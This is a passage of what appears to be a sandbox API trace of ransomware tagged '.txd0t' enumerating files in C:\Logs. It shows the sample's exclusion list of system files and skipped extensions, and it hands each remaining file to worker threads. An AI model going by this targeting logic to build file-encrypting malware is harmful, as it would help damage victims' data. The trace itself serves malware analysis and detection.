(psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="thumbs.db") returned -1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=" ransomware ") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=" ransom ") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="debug.txt") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="boot.ini") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="desktop.ini") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="autorun.inf") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="ntuser.dat") returned -1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="ntldr") returned -1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="ntdetect.com") returned -1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="bootfont.bin") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.129] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned=".evtx" [0088.129] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.129] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.133] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.133] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" [0088.133] SetEvent (hEvent=0x410) returned 1 [0088.133] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0088.133] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=".") returned 1 [0088.133] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="..") returned 1 [0088.133] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.133] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.133] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" [0088.133] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned=".evtx" [0088.133] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=" ransom ") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="debug.txt") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="boot.ini") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.133] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.134] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.134] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="ntldr") returned -1 [0088.134] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.134] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.134] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.134] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned=".evtx" [0088.134] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.134] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0088.145] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.145] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" [0088.145] SetEvent (hEvent=0x3fc) returned 1 [0088.145] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0088.145] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=".") returned 1 [0088.145] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="..") returned 1 [0088.145] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.145] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.146] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" [0088.146] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned=".evtx" [0088.146] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="bootsect.bak") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="iconcache.db") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="thumbs.db") returned -1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=" ransomware ") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=" ransom ") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="debug.txt") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="boot.ini") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="desktop.ini") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="autorun.inf") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="ntuser.dat") returned -1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="ntldr") returned -1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="ntdetect.com") returned -1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="bootfont.bin") returned 1 [0088.146] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.146] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned=".evtx" [0088.146] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.146] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0088.395] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.395] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" [0088.395] SetEvent (hEvent=0x408) returned 1 [0088.395] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0088.395] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=".") returned 1 [0088.395] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="..") returned 1 [0088.395] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.395] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.395] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" [0088.395] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned=".evtx" [0088.395] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="bootsect.bak") returned 1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="iconcache.db") returned 1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="thumbs.db") returned -1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=" ransomware ") returned 1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=" ransom ") returned 1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="debug.txt") returned 1 [0088.395] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="boot.ini") returned 1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="desktop.ini") returned 1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="autorun.inf") returned 1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="ntuser.dat") returned -1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="ntldr") returned -1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="ntdetect.com") returned -1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="bootfont.bin") returned 1 [0088.396] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.396] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned=".evtx" [0088.396] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.396] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.429] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.429] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" [0088.429] SetEvent (hEvent=0x418) returned 1 [0088.429] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0088.429] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=".") returned 1 [0088.429] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="..") returned 1 [0088.429] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.429] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.430] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" [0088.430] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned=".evtx" [0088.430] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=" ransom ") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="debug.txt") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="boot.ini") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="ntldr") returned -1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.430] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.430] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned=".evtx" [0088.430] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.430] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0088.434] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.434] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" [0088.434] SetEvent (hEvent=0x3fc) returned 1 [0088.434] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0088.434] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=".") returned 1 [0088.434] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="..") returned 1 [0088.434] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.434] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.434] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" [0088.434] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned=".evtx" [0088.434] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.434] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="bootsect.bak") returned 1 [0088.434] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="iconcache.db") returned 1 [0088.434] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="thumbs.db") returned -1 [0088.434] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=" ransomware ") returned 1 [0088.434] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=" ransom ") returned 1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="debug.txt") returned 1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="boot.ini") returned 1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="desktop.ini") returned 1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="autorun.inf") returned 1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="ntuser.dat") returned -1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="ntldr") returned -1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="ntdetect.com") returned -1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="bootfont.bin") returned 1 [0088.435] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.435] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned=".evtx" [0088.435] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.435] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.518] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.518] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" [0088.518] SetEvent (hEvent=0x410) returned 1 [0088.518] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0088.518] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=".") returned 1 [0088.518] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="..") returned 1 [0088.518] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.518] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.518] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" [0088.518] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned=".evtx" [0088.518] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="bootsect.bak") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="iconcache.db") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="thumbs.db") returned -1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=" ransomware ") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=" ransom ") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="debug.txt") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="boot.ini") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", 